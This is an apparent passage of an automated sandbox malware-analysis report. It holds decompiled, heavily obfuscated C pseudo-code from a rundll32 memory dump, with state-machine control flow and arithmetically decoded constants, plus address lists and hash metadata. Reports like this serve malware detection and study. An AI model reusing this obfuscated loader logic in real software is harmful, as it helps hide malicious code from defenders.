                                                                                                                      				signed int _v392;
                                                                                                                      				signed int _v396;
                                                                                                                      				signed int _v400;
                                                                                                                      				signed int _v404;
                                                                                                                      				signed int _v408;
                                                                                                                      				signed int _v412;
                                                                                                                      				signed int _v416;
                                                                                                                      				signed int _v420;
                                                                                                                      				signed int _v424;
                                                                                                                      				void* _t385;
                                                                                                                      				void* _t420;
                                                                                                                      				intOrPtr _t421;
                                                                                                                      				intOrPtr _t422;
                                                                                                                      				void* _t428;
                                                                                                                      				void* _t430;
                                                                                                                      				intOrPtr _t439;
                                                                                                                      				intOrPtr _t440;
                                                                                                                      				intOrPtr _t447;
                                                                                                                      				intOrPtr _t448;
                                                                                                                      				signed int _t451;
                                                                                                                      				void* _t458;
                                                                                                                      				intOrPtr _t460;
                                                                                                                      				intOrPtr _t461;
                                                                                                                      				intOrPtr _t495;
                                                                                                                      				signed int _t502;
                                                                                                                      				signed int _t503;
                                                                                                                      				signed int _t504;
                                                                                                                      				signed int _t505;
                                                                                                                      				signed int _t506;
                                                                                                                      				signed int _t507;
                                                                                                                      				signed int _t508;
                                                                                                                      				signed int _t509;
                                                                                                                      				signed int _t510;
                                                                                                                      				signed int _t511;
                                                                                                                      				signed int _t512;
                                                                                                                      				signed int _t513;
                                                                                                                      				void* _t514;
                                                                                                                      				signed int* _t516;
                                                                                                                      				void* _t520;
                                                                                                                      
                                                                                                                      				_push(_a20);
                                                                                                                      				_t514 = __edx;
                                                                                                                      				_push(_a16);
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E002BCF25(_t385);
                                                                                                                      				_v320 = 0x5bfd8;
                                                                                                                      				_t516 =  &(( &_v424)[7]);
                                                                                                                      				_v320 = _v320 ^ 0xae83e4b4;
                                                                                                                      				_v320 = _v320 + 0xffffbfdd;
                                                                                                                      				_t448 = 0;
                                                                                                                      				_v320 = _v320 ^ 0xae801261;
                                                                                                                      				_t451 = 0x4bae340;
                                                                                                                      				_v384 = 0x359b5d;
                                                                                                                      				_v384 = _v384 >> 9;
                                                                                                                      				_v384 = _v384 + 0x5a0;
                                                                                                                      				_v384 = _v384 ^ 0x40b7bf66;
                                                                                                                      				_v384 = _v384 ^ 0x40befa95;
                                                                                                                      				_v316 = 0x2933e6;
                                                                                                                      				_t502 = 0x13;
                                                                                                                      				_t504 = 0xf;
                                                                                                                      				_v316 = _v316 * 0x63;
                                                                                                                      				_v316 = _v316 ^ 0x0fe001ce;
                                                                                                                      				_v300 = 0x5708b8;
                                                                                                                      				_v300 = _v300 | 0xa16343bc;
                                                                                                                      				_v300 = _v300 ^ 0xa1786c90;
                                                                                                                      				_v308 = 0x5d4fad;
                                                                                                                      				_v308 = _v308 + 0xffffde8c;
                                                                                                                      				_v308 = _v308 ^ 0x0055ed4e;
                                                                                                                      				_v312 = 0x97068f;
                                                                                                                      				_v312 = _v312 >> 1;
                                                                                                                      				_v312 = _v312 ^ 0x0045ea4b;
                                                                                                                      				_v284 = 0xe9a634;
                                                                                                                      				_v284 = _v284 ^ 0x5bc7ef92;
                                                                                                                      				_v284 = _v284 ^ 0x5b2ed6c9;
                                                                                                                      				_v344 = 0xd52660;
                                                                                                                      				_v344 = _v344 + 0x6034;
                                                                                                                      				_v344 = _v344 >> 7;
                                                                                                                      				_v344 = _v344 ^ 0x000a9937;
                                                                                                                      				_v412 = 0x492529;
                                                                                                                      				_t55 =  &_v412; // 0x492529
                                                                                                                      				_v412 =  *_t55 * 0xa;
                                                                                                                      				_t57 =  &_v412; // 0x492529
                                                                                                                      				_v412 =  *_t57 / _t502;
                                                                                                                      				_t63 =  &_v412; // 0x492529
                                                                                                                      				_v412 =  *_t63 / _t504;
                                                                                                                      				_v412 = _v412 ^ 0x000522b4;
                                                                                                                      				_v360 = 0xff1035;
                                                                                                                      				_v360 = _v360 >> 5;
                                                                                                                      				_v360 = _v360 << 5;
                                                                                                                      				_v360 = _v360 ^ 0x00f6febc;
                                                                                                                      				_v352 = 0x24acbd;
                                                                                                                      				_v352 = _v352 >> 0xc;
                                                                                                                      				_v352 = _v352 * 0x36;
                                                                                                                      				_v352 = _v352 ^ 0x000a49b8;
                                                                                                                      				_v404 = 0x5e8a96;
                                                                                                                      				_v404 = _v404 >> 1;
                                                                                                                      				_v404 = _v404 / _t502;
                                                                                                                      				_v404 = _v404 + 0xffff7de4;
                                                                                                                      				_v404 = _v404 ^ 0x00019221;
                                                                                                                      				_v372 = 0xa45532;
                                                                                                                      				_v372 = _v372 + 0xffff1c48;
                                                                                                                      				_v372 = _v372 + 0xffffe0f0;
                                                                                                                      				_t505 = 0x6c;
                                                                                                                      				_v372 = _v372 * 0x6c;
                                                                                                                      				_v372 = _v372 ^ 0x44ea3f2c;
                                                                                                                      				_v380 = 0xf56085;
                                                                                                                      				_v380 = _v380 / _t505;
                                                                                                                      				_t506 = 0xd;
                                                                                                                      				_v380 = _v380 / _t506;
                                                                                                                      				_v380 = _v380 << 0xe;
                                                                                                                      				_v380 = _v380 ^ 0x0b2ea957;
                                                                                                                      				_v328 = 0x46776f;
                                                                                                                      				_v328 = _v328 + 0x15ec;
                                                                                                                      				_t507 = 0x1c;
                                                                                                                      				_v328 = _v328 * 0x5e;
                                                                                                                      				_v328 = _v328 ^ 0x19ebcb1f;
                                                                                                                      				_v388 = 0xfbc23f;
                                                                                                                      				_v388 = _v388 | 0xf6357e00;
                                                                                                                      				_v388 = _v388 + 0x8932;
                                                                                                                      				_v388 = _v388 ^ 0xf4ea365f;
                                                                                                                      				_v388 = _v388 ^ 0x03ea209f;
                                                                                                                      				_v336 = 0x730db6;
                                                                                                                      				_v336 = _v336 * 0x5b;
                                                                                                                      				_v336 = _v336 | 0x6492896b;
                                                                                                                      				_v336 = _v336 ^ 0x6cf77a3a;
                                                                                                                      				_v340 = 0x166b3b;
                                                                                                                      				_v340 = _v340 | 0x8c211161;
                                                                                                                      				_v340 = _v340 ^ 0x8c378fd9;
                                                                                                                      				_v396 = 0x9d5a93;
                                                                                                                      				_v396 = _v396 / _t507;
                                                                                                                      				_v396 = _v396 ^ 0xba861a50;
                                                                                                                      				_v396 = _v396 + 0xffff5b99;
                                                                                                                      				_v396 = _v396 ^ 0xba80e2b9;
                                                                                                                      				_v420 = 0x409c68;
                                                                                                                      				_t508 = 0x31;
                                                                                                                      				_v420 = _v420 / _t508;
                                                                                                                      				_v420 = _v420 >> 8;
                                                                                                                      				_t509 = 5;
                                                                                                                      				_v420 = _v420 * 0x16;
                                                                                                                      				_v420 = _v420 ^ 0x00013fee;
                                                                                                                      				_v296 = 0xc785e1;
                                                                                                                      				_v296 = _v296 ^ 0x791e03db;
                                                                                                                      				_v296 = _v296 ^ 0x79d79a97;
                                                                                                                      				_v364 = 0xad0976;
                                                                                                                      				_v364 = _v364 | 0x8850e8a8;
                                                                                                                      				_v364 = _v364 << 1;
                                                                                                                      				_v364 = _v364 ^ 0x11fb25d1;
                                                                                                                      				_v368 = 0x704a10;
                                                                                                                      				_v368 = _v368 + 0xffff0d6b;
                                                                                                                      				_v368 = _v368 << 2;
                                                                                                                      				_v368 = _v368 ^ 0x01b3e76e;
                                                                                                                      				_v288 = 0x54d2f6;
                                                                                                                      				_v288 = _v288 / _t509;
                                                                                                                      				_v288 = _v288 ^ 0x001edf05;
                                                                                                                      				_v392 = 0x949bbb;
                                                                                                                      				_v392 = _v392 + 0xbb88;
                                                                                                                      				_v392 = _v392 | 0xb3cb4dcc;
                                                                                                                      				_v392 = _v392 * 0x45;
                                                                                                                      				_v392 = _v392 ^ 0x7b348758;
                                                                                                                      				_v416 = 0x643691;
                                                                                                                      				_v416 = _v416 >> 9;
                                                                                                                      				_v416 = _v416 + 0xffff74a1;
                                                                                                                      				_t510 = 0x4e;
                                                                                                                      				_v416 = _v416 / _t510;
                                                                                                                      				_v416 = _v416 ^ 0x03464fba;
                                                                                                                      				_v356 = 0xeb775b;
                                                                                                                      				_v356 = _v356 + 0xdb8c;
                                                                                                                      				_v356 = _v356 >> 0x10;
                                                                                                                      				_v356 = _v356 ^ 0x0001ede4;
                                                                                                                      				_v304 = 0xc1e7b5;
                                                                                                                      				_v304 = _v304 + 0xf3ef;
                                                                                                                      				_v304 = _v304 ^ 0x00c2397a;
                                                                                                                      				_v376 = 0xa68bc9;
                                                                                                                      				_t511 = 0x43;
                                                                                                                      				_v376 = _v376 / _t511;
                                                                                                                      				_v376 = _v376 >> 8;
                                                                                                                      				_v376 = _v376 ^ 0x3383f04e;
                                                                                                                      				_v376 = _v376 ^ 0x3381e4d6;
                                                                                                                      				_v408 = 0x4d9cfa;
                                                                                                                      				_t512 = 0x46;
                                                                                                                      				_t503 = _v340;
                                                                                                                      				_v408 = _v408 * 0x6f;
                                                                                                                      				_v408 = _v408 + 0x3c4a;
                                                                                                                      				_v408 = _v408 << 2;
                                                                                                                      				_v408 = _v408 ^ 0x869e5b7f;
                                                                                                                      				_v324 = 0x71360b;
                                                                                                                      				_v324 = _v324 * 0xc;
                                                                                                                      				_v324 = _v324 ^ 0x901d1633;
                                                                                                                      				_v324 = _v324 ^ 0x9559eaf9;
                                                                                                                      				_v292 = 0x9a124c;
                                                                                                                      				_v292 = _v292 + 0x530b;
                                                                                                                      				_v292 = _v292 ^ 0x0097d0f0;
                                                                                                                      				_v424 = 0x6705b6;
                                                                                                                      				_v424 = _v424 ^ 0xd04d23dd;
                                                                                                                      				_v424 = _v424 << 4;
                                                                                                                      				_v424 = _v424 >> 0xa;
                                                                                                                      				_v424 = _v424 ^ 0x000c33e5;
                                                                                                                      				_v348 = 0x1e9503;
                                                                                                                      				_v348 = _v348 >> 3;
                                                                                                                      				_v348 = _v348 ^ 0x290fe667;
                                                                                                                      				_v348 = _v348 ^ 0x2908b2d4;
                                                                                                                      				_v400 = 0xb348f5;
                                                                                                                      				_v400 = _v400 ^ 0x711fc93f;
                                                                                                                      				_v400 = _v400 << 8;
                                                                                                                      				_v400 = _v400 * 0x58;
                                                                                                                      				_v400 = _v400 ^ 0x4c97e764;
                                                                                                                      				_v332 = 0xe64092;
                                                                                                                      				_t513 = _v340;
                                                                                                                      				_v332 = _v332 / _t512;
                                                                                                                      				_v332 = _v332 + 0x1e96;
                                                                                                                      				_v332 = _v332 ^ 0x00036ca6;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					_t420 = 0xee6d0ab;
                                                                                                                      					do {
                                                                                                                      						while(1) {
                                                                                                                      							L2:
                                                                                                                      							_t520 = _t451 - 0x77439d8;
                                                                                                                      							if(_t520 > 0) {
                                                                                                                      								break;
                                                                                                                      							}
                                                                                                                      							if(_t520 == 0) {
                                                                                                                      								E002B68DE(_v420, _v296, _v364, _v368, _v264);
                                                                                                                      								_t516 =  &(_t516[3]);
                                                                                                                      								_t451 = 0x2f9aadd;
                                                                                                                      								while(1) {
                                                                                                                      									L1:
                                                                                                                      									_t420 = 0xee6d0ab;
                                                                                                                      									goto L2;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								if(_t451 == 0x195d899) {
                                                                                                                      									_t460 =  *0x2d5214; // 0x0
                                                                                                                      									_t439 =  *((intOrPtr*)( *((intOrPtr*)(_t460 + 0x3c)) + 0x58));
                                                                                                                      									 *((intOrPtr*)(_t460 + 0x38)) =  *((intOrPtr*)(_t460 + 0x38)) + 1;
                                                                                                                      									_t495 =  *((intOrPtr*)(_t460 + 0x38));
                                                                                                                      									 *((intOrPtr*)(_t460 + 0x3c)) = _t439;
                                                                                                                      									if(_t439 == 0) {
                                                                                                                      										 *((intOrPtr*)(_t460 + 0x3c)) =  *((intOrPtr*)(_t460 + 4));
                                                                                                                      									}
                                                                                                                      									_t440 =  *0x2d5214; // 0x0
                                                                                                                      									if(_t495 >=  *((intOrPtr*)(_t440 + 0x44))) {
                                                                                                                      										_t461 =  *0x2d5214; // 0x0
                                                                                                                      										 *(_t461 + 0x38) =  *(_t461 + 0x38) & 0x00000000;
                                                                                                                      									} else {
                                                                                                                      										_t451 = 0x4bae340;
                                                                                                                      										while(1) {
                                                                                                                      											L1:
                                                                                                                      											_t420 = 0xee6d0ab;
                                                                                                                      											goto L2;
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									if(_t451 == 0x2f9aadd) {
                                                                                                                      										E002B68DE(_v288, _v392, _v416, _v356, _v280);
                                                                                                                      										E002B68DE(_v304, _v376, _v408, _v324, _t513);
                                                                                                                      										E002B68DE(_v292, _v424, _v348, _v400, _v272);
                                                                                                                      										_t516 =  &(_t516[9]);
                                                                                                                      										_t451 = _t503;
                                                                                                                      										L33:
                                                                                                                      										_t420 = 0xee6d0ab;
                                                                                                                      										goto L34;
                                                                                                                      									} else {
                                                                                                                      										if(_t451 == 0x4bae340) {
                                                                                                                      											_t513 = 0;
                                                                                                                      											E002D1310(0x100,  &_v256, _v320, _v384, _v316, _v300);
                                                                                                                      											_v272 = _v272 & 0;
                                                                                                                      											_t516 =  &(_t516[4]);
                                                                                                                      											_v268 = _v268 & 0;
                                                                                                                      											_t451 = 0xce40172;
                                                                                                                      											_v280 = _v280 & 0;
                                                                                                                      											_v276 = _v276 & 0;
                                                                                                                      											while(1) {
                                                                                                                      												L1:
                                                                                                                      												_t420 = 0xee6d0ab;
                                                                                                                      												goto L2;
                                                                                                                      											}
                                                                                                                      										} else {
                                                                                                                      											if(_t451 != 0x55bcf65) {
                                                                                                                      												goto L34;
                                                                                                                      											} else {
                                                                                                                      												if(_v276 >= _v332) {
                                                                                                                      													_t447 = E002C6864( &_v280,  &_v272);
                                                                                                                      												} else {
                                                                                                                      													_t447 = E002C2753( &_v280);
                                                                                                                      												}
                                                                                                                      												_t513 = _t447;
                                                                                                                      												_t420 = 0xee6d0ab;
                                                                                                                      												_t451 =  !=  ? 0xee6d0ab : 0x2f9aadd;
                                                                                                                      												continue;
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							L37:
                                                                                                                      							return _t448;
                                                                                                                      						}
                                                                                                                      						if(_t451 == 0xa3ea571) {
                                                                                                                      							_t421 =  *0x2d5214; // 0x0
                                                                                                                      							_t422 =  *0x2d5214; // 0x0
                                                                                                                      							_t428 = E002C7BCA(( *(_t421 + 0x3c))[0x28] & 0x0000ffff,  &_v256,  *( *(_t421 + 0x3c)) & 0x0000ffff, _v372, _v380, _v328, _t513,  &_v272,  &_v264, _v388,  *((intOrPtr*)(_t422 + 0x3c)) + 0x20, _v336);
                                                                                                                      							_t516 =  &(_t516[0xa]);
                                                                                                                      							if(_t428 == 0) {
                                                                                                                      								_t503 = 0x195d899;
                                                                                                                      								_t451 = 0x2f9aadd;
                                                                                                                      								goto L33;
                                                                                                                      							} else {
                                                                                                                      								_t451 = 0xcddb738;
                                                                                                                      								goto L1;
                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							if(_t451 == 0xcddb738) {
                                                                                                                      								if(E002BBD0F( &_v264, _v340, _t514, _v396) == 0) {
                                                                                                                      									_t503 = 0x195d899;
                                                                                                                      								} else {
                                                                                                                      									_t503 = 0x1fe0da0;
                                                                                                                      									_t448 = 1;
                                                                                                                      								}
                                                                                                                      								_t451 = 0x77439d8;
                                                                                                                      								while(1) {
                                                                                                                      									L1:
                                                                                                                      									_t420 = 0xee6d0ab;
                                                                                                                      									goto L2;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								if(_t451 == 0xce40172) {
                                                                                                                      									_t430 = E002B1F9B(_a20,  &_v280, _v308, _v312, _v284, _v344, _a8);
                                                                                                                      									_t516 =  &(_t516[5]);
                                                                                                                      									if(_t430 != 0) {
                                                                                                                      										_t451 = 0x55bcf65;
                                                                                                                      										while(1) {
                                                                                                                      											L1:
                                                                                                                      											_t420 = 0xee6d0ab;
                                                                                                                      											goto L2;
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									if(_t451 != _t420) {
                                                                                                                      										goto L34;
                                                                                                                      									} else {
                                                                                                                      										_push(E002BEF71(1, 0x40));
                                                                                                                      										_push(_v404);
                                                                                                                      										_push( &_v256);
                                                                                                                      										_t458 = 0xb;
                                                                                                                      										E002B5A07(_t458, _v352);
                                                                                                                      										_t516 =  &(_t516[5]);
                                                                                                                      										_t451 = 0xa3ea571;
                                                                                                                      										while(1) {
                                                                                                                      											L1:
                                                                                                                      											_t420 = 0xee6d0ab;
                                                                                                                      											goto L2;
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						goto L37;
                                                                                                                      						L34:
                                                                                                                      					} while (_t451 != 0x1fe0da0);
                                                                                                                      					goto L37;
                                                                                                                      				}
                                                                                                                      			}

                                                                                                                      0x002b622a
                                                                                                                      0x002b6232
                                                                                                                      0x002b623a
                                                                                                                      0x002b6244
                                                                                                                      0x002b6248
                                                                                                                      0x002b6250
                                                                                                                      0x002b6258
                                                                                                                      0x002b6260
                                                                                                                      0x002b6268
                                                                                                                      0x002b6279
                                                                                                                      0x002b627c
                                                                                                                      0x002b6280
                                                                                                                      0x002b6288
                                                                                                                      0x002b6298
                                                                                                                      0x002b62a0
                                                                                                                      0x002b62a5
                                                                                                                      0x002b62ab
                                                                                                                      0x002b62b0
                                                                                                                      0x002b62b8
                                                                                                                      0x002b62c0
                                                                                                                      0x002b62cd
                                                                                                                      0x002b62d0
                                                                                                                      0x002b62d4
                                                                                                                      0x002b62dc
                                                                                                                      0x002b62e4
                                                                                                                      0x002b62ec
                                                                                                                      0x002b62f4
                                                                                                                      0x002b62fc
                                                                                                                      0x002b6304
                                                                                                                      0x002b6311
                                                                                                                      0x002b6315
                                                                                                                      0x002b631d
                                                                                                                      0x002b6325
                                                                                                                      0x002b632d
                                                                                                                      0x002b6335
                                                                                                                      0x002b633d
                                                                                                                      0x002b634d
                                                                                                                      0x002b6351
                                                                                                                      0x002b6359
                                                                                                                      0x002b6361
                                                                                                                      0x002b6369
                                                                                                                      0x002b6375
                                                                                                                      0x002b637a
                                                                                                                      0x002b6380
                                                                                                                      0x002b638a
                                                                                                                      0x002b638b
                                                                                                                      0x002b638f
                                                                                                                      0x002b6397
                                                                                                                      0x002b63a2
                                                                                                                      0x002b63ad
                                                                                                                      0x002b63b8
                                                                                                                      0x002b63c0
                                                                                                                      0x002b63c8
                                                                                                                      0x002b63cc
                                                                                                                      0x002b63d4
                                                                                                                      0x002b63dc
                                                                                                                      0x002b63e4
                                                                                                                      0x002b63e9
                                                                                                                      0x002b63f1
                                                                                                                      0x002b6405
                                                                                                                      0x002b640c
                                                                                                                      0x002b6417
                                                                                                                      0x002b641f
                                                                                                                      0x002b6427
                                                                                                                      0x002b6434
                                                                                                                      0x002b6438
                                                                                                                      0x002b6442
                                                                                                                      0x002b644a
                                                                                                                      0x002b644f
                                                                                                                      0x002b645d
                                                                                                                      0x002b6462
                                                                                                                      0x002b6468
                                                                                                                      0x002b6470
                                                                                                                      0x002b6478
                                                                                                                      0x002b6480
                                                                                                                      0x002b6485
                                                                                                                      0x002b648d
                                                                                                                      0x002b6498
                                                                                                                      0x002b64a3
                                                                                                                      0x002b64ae
                                                                                                                      0x002b64ba
                                                                                                                      0x002b64bf
                                                                                                                      0x002b64c5
                                                                                                                      0x002b64ca
                                                                                                                      0x002b64d2
                                                                                                                      0x002b64da
                                                                                                                      0x002b64e7
                                                                                                                      0x002b64e8
                                                                                                                      0x002b64ec
                                                                                                                      0x002b64f0
                                                                                                                      0x002b64f8
                                                                                                                      0x002b64fd
                                                                                                                      0x002b6505
                                                                                                                      0x002b6512
                                                                                                                      0x002b6516
                                                                                                                      0x002b651e
                                                                                                                      0x002b6526
                                                                                                                      0x002b6531
                                                                                                                      0x002b653c
                                                                                                                      0x002b6547
                                                                                                                      0x002b654f
                                                                                                                      0x002b6557
                                                                                                                      0x002b655c
                                                                                                                      0x002b6561
                                                                                                                      0x002b6569
                                                                                                                      0x002b6571
                                                                                                                      0x002b6576
                                                                                                                      0x002b657e
                                                                                                                      0x002b6586
                                                                                                                      0x002b658e
                                                                                                                      0x002b6596
                                                                                                                      0x002b65a0
                                                                                                                      0x002b65a4
                                                                                                                      0x002b65ac
                                                                                                                      0x002b65ba
                                                                                                                      0x002b65be
                                                                                                                      0x002b65c2
                                                                                                                      0x002b65ca
                                                                                                                      0x002b65d2
                                                                                                                      0x002b65d2
                                                                                                                      0x002b65d2
                                                                                                                      0x002b65d7
                                                                                                                      0x002b65d7
                                                                                                                      0x002b65d7
                                                                                                                      0x002b65d7
                                                                                                                      0x002b65dd
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002b65e3
                                                                                                                      0x002b675c
                                                                                                                      0x002b6761
                                                                                                                      0x002b6764
                                                                                                                      0x002b65d2
                                                                                                                      0x002b65d2
                                                                                                                      0x002b65d2
                                                                                                                      0x00000000
                                                                                                                      0x002b65d2
                                                                                                                      0x002b65e9
                                                                                                                      0x002b65ef
                                                                                                                      0x002b670b
                                                                                                                      0x002b6714
                                                                                                                      0x002b6717
                                                                                                                      0x002b671a
                                                                                                                      0x002b671d
                                                                                                                      0x002b6722
                                                                                                                      0x002b6727
                                                                                                                      0x002b6727
                                                                                                                      0x002b672a
                                                                                                                      0x002b6732
                                                                                                                      0x002b68c7
                                                                                                                      0x002b68cd
                                                                                                                      0x002b6738
                                                                                                                      0x002b6738
                                                                                                                      0x002b65d2
                                                                                                                      0x002b65d2
                                                                                                                      0x002b65d2
                                                                                                                      0x00000000
                                                                                                                      0x002b65d2
                                                                                                                      0x002b65d2
                                                                                                                      0x002b65f5
                                                                                                                      0x002b65fb
                                                                                                                      0x002b66be
                                                                                                                      0x002b66da
                                                                                                                      0x002b66fc
                                                                                                                      0x002b6701
                                                                                                                      0x002b6704
                                                                                                                      0x002b68b4
                                                                                                                      0x002b68b4
                                                                                                                      0x00000000
                                                                                                                      0x002b6601
                                                                                                                      0x002b6607
                                                                                                                      0x002b6669
                                                                                                                      0x002b6676
                                                                                                                      0x002b667b
                                                                                                                      0x002b6682
                                                                                                                      0x002b6685
                                                                                                                      0x002b668c
                                                                                                                      0x002b6691
                                                                                                                      0x002b6698
                                                                                                                      0x002b65d2
                                                                                                                      0x002b65d2
                                                                                                                      0x002b65d2
                                                                                                                      0x00000000
                                                                                                                      0x002b65d2
                                                                                                                      0x002b6609
                                                                                                                      0x002b660f
                                                                                                                      0x00000000
                                                                                                                      0x002b6615
                                                                                                                      0x002b6627
                                                                                                                      0x002b6637
                                                                                                                      0x002b6629
                                                                                                                      0x002b6629
                                                                                                                      0x002b6629
                                                                                                                      0x002b663c
                                                                                                                      0x002b6645
                                                                                                                      0x002b664a
                                                                                                                      0x00000000
                                                                                                                      0x002b664a
                                                                                                                      0x002b660f
                                                                                                                      0x002b6607
                                                                                                                      0x002b65fb
                                                                                                                      0x002b65ef
                                                                                                                      0x002b68d4
                                                                                                                      0x002b68dd
                                                                                                                      0x002b68dd
                                                                                                                      0x002b6774
                                                                                                                      0x002b684d
                                                                                                                      0x002b685c
                                                                                                                      0x002b6894
                                                                                                                      0x002b6899
                                                                                                                      0x002b689e
                                                                                                                      0x002b68aa
                                                                                                                      0x002b68af
                                                                                                                      0x00000000
                                                                                                                      0x002b68a0
                                                                                                                      0x002b68a0
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )%I$,?D$4`$J<$KE$NU$[w$owF$3)
                                                                                                                      • API String ID: 0-2094660596
                                                                                                                      • Opcode ID: 4cd56e8a9fadaf15ec37961597618454d2a50db531e880c693318dc49c86f587
                                                                                                                      • Instruction ID: e89a1bf2f5eb1b754e3f1d10224de60e7c6c114e7b55b9f9d9f3c8419433e81f
                                                                                                                      • Opcode Fuzzy Hash: 4cd56e8a9fadaf15ec37961597618454d2a50db531e880c693318dc49c86f587
                                                                                                                      • Instruction Fuzzy Hash: DB225371518381DFD364CF25C48AA9BBBF2FBC4758F10890DF68A8A260C7B58959CF42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E002CACD3(intOrPtr* __ecx) {
                                                                                                                      				intOrPtr _v4;
                                                                                                                      				intOrPtr _v8;
                                                                                                                      				intOrPtr* _v12;
                                                                                                                      				char _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				signed int _v156;
                                                                                                                      				signed int _v160;
                                                                                                                      				void* _t358;
                                                                                                                      				void* _t359;
                                                                                                                      				intOrPtr _t360;
                                                                                                                      				void* _t366;
                                                                                                                      				void* _t375;
                                                                                                                      				signed int _t378;
                                                                                                                      				signed int _t379;
                                                                                                                      				signed int _t380;
                                                                                                                      				signed int _t381;
                                                                                                                      				signed int _t382;
                                                                                                                      				signed int _t383;
                                                                                                                      				signed int _t384;
                                                                                                                      				signed int _t385;
                                                                                                                      				intOrPtr* _t426;
                                                                                                                      				intOrPtr _t430;
                                                                                                                      				signed int* _t431;
                                                                                                                      
                                                                                                                      				_t431 =  &_v160;
                                                                                                                      				_t426 = __ecx;
                                                                                                                      				_v12 = __ecx;
                                                                                                                      				_v8 = 0x8c571a;
                                                                                                                      				_t430 = 0;
                                                                                                                      				_t375 = 0x79707ab;
                                                                                                                      				_v4 = 0;
                                                                                                                      				_v64 = 0xfc5ff;
                                                                                                                      				_v64 = _v64 >> 6;
                                                                                                                      				_v64 = _v64 ^ 0x00003f17;
                                                                                                                      				_v140 = 0x873397;
                                                                                                                      				_v140 = _v140 * 0x50;
                                                                                                                      				_v140 = _v140 << 5;
                                                                                                                      				_v140 = _v140 << 4;
                                                                                                                      				_v140 = _v140 ^ 0x803e6000;
                                                                                                                      				_v112 = 0x5cc448;
                                                                                                                      				_v112 = _v112 | 0xb5fdf5b7;
                                                                                                                      				_v112 = _v112 >> 9;
                                                                                                                      				_v112 = _v112 ^ 0x005afefa;
                                                                                                                      				_v60 = 0x19d054;
                                                                                                                      				_t378 = 0x29;
                                                                                                                      				_v60 = _v60 / _t378;
                                                                                                                      				_v60 = _v60 ^ 0x0000a12d;
                                                                                                                      				_v40 = 0x4c7c9b;
                                                                                                                      				_t379 = 0x7b;
                                                                                                                      				_v40 = _v40 / _t379;
                                                                                                                      				_v40 = _v40 ^ 0x00009f31;
                                                                                                                      				_v88 = 0xb88e01;
                                                                                                                      				_v88 = _v88 << 8;
                                                                                                                      				_v88 = _v88 | 0xb280bd16;
                                                                                                                      				_v88 = _v88 ^ 0xba886110;
                                                                                                                      				_v80 = 0xf71efc;
                                                                                                                      				_v80 = _v80 << 9;
                                                                                                                      				_t380 = 0x34;
                                                                                                                      				_v80 = _v80 / _t380;
                                                                                                                      				_v80 = _v80 ^ 0x04950844;
                                                                                                                      				_v96 = 0xf5fda;
                                                                                                                      				_v96 = _v96 >> 7;
                                                                                                                      				_t381 = 0x11;
                                                                                                                      				_v96 = _v96 * 0x46;
                                                                                                                      				_v96 = _v96 ^ 0x00041aa2;
                                                                                                                      				_v156 = 0x96c5de;
                                                                                                                      				_v156 = _v156 / _t381;
                                                                                                                      				_v156 = _v156 ^ 0x88ccdc31;
                                                                                                                      				_v156 = _v156 * 0x3d;
                                                                                                                      				_v156 = _v156 ^ 0x96be8a04;
                                                                                                                      				_v72 = 0x71396c;
                                                                                                                      				_v72 = _v72 << 0xa;
                                                                                                                      				_v72 = _v72 ^ 0x367e7763;
                                                                                                                      				_v72 = _v72 ^ 0xf298a4dc;
                                                                                                                      				_v148 = 0xd59d39;
                                                                                                                      				_v148 = _v148 >> 6;
                                                                                                                      				_v148 = _v148 + 0xffff0863;
                                                                                                                      				_v148 = _v148 << 4;
                                                                                                                      				_v148 = _v148 ^ 0x0020b4d1;
                                                                                                                      				_v116 = 0x4e2a72;
                                                                                                                      				_v116 = _v116 ^ 0x41f61916;
                                                                                                                      				_t382 = 0x66;
                                                                                                                      				_v116 = _v116 / _t382;
